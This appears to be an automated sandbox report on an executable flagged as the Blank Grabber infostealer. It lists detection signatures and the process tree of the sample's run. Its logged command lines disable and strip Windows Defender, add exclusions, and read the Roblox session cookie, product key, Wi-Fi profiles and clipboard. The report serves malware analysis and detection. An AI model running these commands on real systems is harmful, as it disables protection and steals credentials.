Windows
Analysis Report
Built (1).exe
Overview
General Information
Detection
Blank Grabber
Score | 100 |
---|---|
Range | 0 - 100 |
Whitelisted | false |
Confidence | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
Adds a directory exclusion to Windows Defender
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Classification
- System is w10x64
- Built (1).exe (PID: 7528 cmdline: "C:\Users\user\Desktop\Built (1).exe" MD5: 95567CF5F31A7D7F34AE092E68F9999D)
- Built (1).exe (PID: 7544 cmdline: "C:\Users\user\Desktop\Built (1).exe" MD5: 95567CF5F31A7D7F34AE092E68F9999D)
- cmd.exe (PID: 7596 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built (1).exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7680 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built (1).exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
- cmd.exe (PID: 7604 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7700 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
- MpCmdRun.exe (PID: 7628 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
- cmd.exe (PID: 7692 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7764 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
- cmd.exe (PID: 7948 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tasklist.exe (PID: 8168 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
- cmd.exe (PID: 7964 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tasklist.exe (PID: 6032 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
- conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 8088 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- WMIC.exe (PID: 4192 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- cmd.exe (PID: 8104 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5264 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
- cmd.exe (PID: 8128 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tasklist.exe (PID: 7252 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
- cmd.exe (PID: 8160 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tree.com (PID: 7296 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
- cmd.exe (PID: 8204 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- netsh.exe (PID: 8256 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
- cmd.exe (PID: 8316 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- systeminfo.exe (PID: 8400 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
- cmd.exe (PID: 8384 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- reg.exe (PID: 8580 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
- cmd.exe (PID: 8392 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tree.com (PID: 8548 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
- cmd.exe (PID: 8656 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tree.com (PID: 8788 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
- cmd.exe (PID: 8696 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- attrib.exe (PID: 8852 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
- cmd.exe (PID: 8704 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- getmac.exe (PID: 8836 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
- cmd.exe (PID: 8884 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- attrib.exe (PID: 8976 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
- cmd.exe (PID: 8928 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tree.com (PID: 8996 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
- cmd.exe (PID: 9020 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 9036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tasklist.exe (PID: 9084 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
- cmd.exe (PID: 9064 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 9096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tree.com (PID: 9152 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
- cmd.exe (PID: 9168 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 9180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7280 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
- cmd.exe (PID: 7272 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tree.com (PID: 8212 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
- cmd.exe (PID: 3632 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5284 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
- cmd.exe (PID: 1228 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75282\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R4aMj.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- rar.exe (PID: 8204 cmdline: C:\Users\user\AppData\Local\Temp\_MEI75282\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R4aMj.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
- cmd.exe (PID: 8468 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- WMIC.exe (PID: 7856 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- cmd.exe (PID: 7924 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- WMIC.exe (PID: 8320 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- cmd.exe (PID: 8612 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- WMIC.exe (PID: 8868 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- cmd.exe (PID: 8784 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 8748 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
- cmd.exe (PID: 8884 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- WMIC.exe (PID: 8880 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- cmd.exe (PID: 8948 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 1360 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
No configs have been found.
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | |
 | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | |
 | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | |
 | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | |
 | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems) |
Source: | Author: Florian Roth (Nextron Systems) |
Source: | Author: @ROxPinTeddy |
Source: | Author: Nasreddine Bencherchali (Nextron Systems) |
Source: | Author: Nasreddine Bencherchali (Nextron Systems) |
Source: | Author: Florian Roth (Nextron Systems) |
Source: | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
Source: | Author: frack113 |
Source: | Author: Timur Zinniatullin, E.M. Anhaus, oscd.community |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) |
Stealing of Sensitive Information |
---|
Source: | Author: Joe Security |
No Snort rule has matched.
AV Detection |
---|
Source: | Avira |
Source: | URL Reputation |
Source: | ReversingLabs |
Source: | Joe Sandbox ML |
Source: | Code function: 74_2_00007FF70F38901C |
Source: | Static PE information |